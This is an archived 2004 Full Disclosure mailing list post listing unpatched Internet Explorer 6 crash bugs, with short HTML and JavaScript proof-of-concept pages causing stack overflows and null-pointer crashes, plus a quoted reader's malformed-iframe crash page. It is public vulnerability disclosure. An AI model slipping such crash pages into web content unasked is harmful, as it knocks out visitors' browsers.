Full Disclosure mailing list archives
Re: IE bugs (Was: Web browsers - a mini-farce)
From: "Berend-Jan Wever" <skylined () edup tudelft nl>
Date: Wed, 20 Oct 2004 13:43:53 +0200
Here's some IE bugs out of my own collection that still aren't patched (IE6.0 W2K):
Stack overflows (_not_ buffer overflows):
<HTML>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
<SCRIPT> a = new Array(); while (1) { (a = new Array(a)).sort(); } </SCRIPT>
</HTML>
<HTML> <BODY onLoad="A"><IMG src="::" onError="this.src=this.src;"></BODY> </HTML>
Null pointer:
<HTML style="width:expression(navigate('?#'))">
<HEAD> <META http-equiv="Page-Enter" content="blendTrans()"> </HEAD>
</HTML>
None of them pose a security-risk and they all require JavaScript. So now I actually forgot why I decided to mention
them in a reply to this post. Well, maybe MS can fix them in the next SP now that they know about them...
Cheers,
SkyLined
----- Original Message -----
From: "Martin" <nakal () nurfuerspam de>
To: "Michal Zalewski" <lcamtuf () ghettot org>
Cc: "Full Disclosure" <full-disclosure () netsys com>
Sent: Wednesday, October 20, 2004 02:38
Subject: Re: [Full-disclosure] Web browsers - a mini-farce
Am Mo, den 18.10.2004 schrieb Michal Zalewski um 16:18:All browsers but Microsoft Internet Explorer kept crashing on a regular basisHere, may I make your collection more complete? This one is for IE6 on MS-Windows 2000: <html><base href="ftp*://"> <body> <iframe src="????"/> </body> </html> Martin PS: No, it's not been discovered by your tool. And I reported it already several years ago. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Re: Web browsers - a mini-farce, (continued)
- Re: Re: Web browsers - a mini-farce Micheal Espinola Jr (Oct 19)
- Re: Re: Web browsers - a mini-farce kf_lists (Oct 19)
- Re: Re: Web browsers - a mini-farce Byron L. Sonne (Oct 19)
- Re: Re: Web browsers - a mini-farce Micheal Espinola Jr (Oct 19)
- Re: Re: Web browsers - a mini-farce Georgi Guninski (Oct 20)
- Re: Web browsers - a mini-farce Michal Zalewski (Oct 20)
- Re: Web browsers - a mini-farce Daniel Veditz (Oct 20)
- Re: Web browsers - a mini-farce Pablo (Oct 20)
- Re: IE bugs (Was: Web browsers - a mini-farce) Berend-Jan Wever (Oct 20)
- RE: Re: IE bugs (Was: Web browsers - a mini-farce) Aviv Raff (Oct 20)
- Re: Update: Web browsers - a mini-farce (MSIE gives in) Daniel Veditz (Oct 24)
- Re: Update: Web browsers - a mini-farce (MSIE gives in) Georgi Guninski (Oct 31)
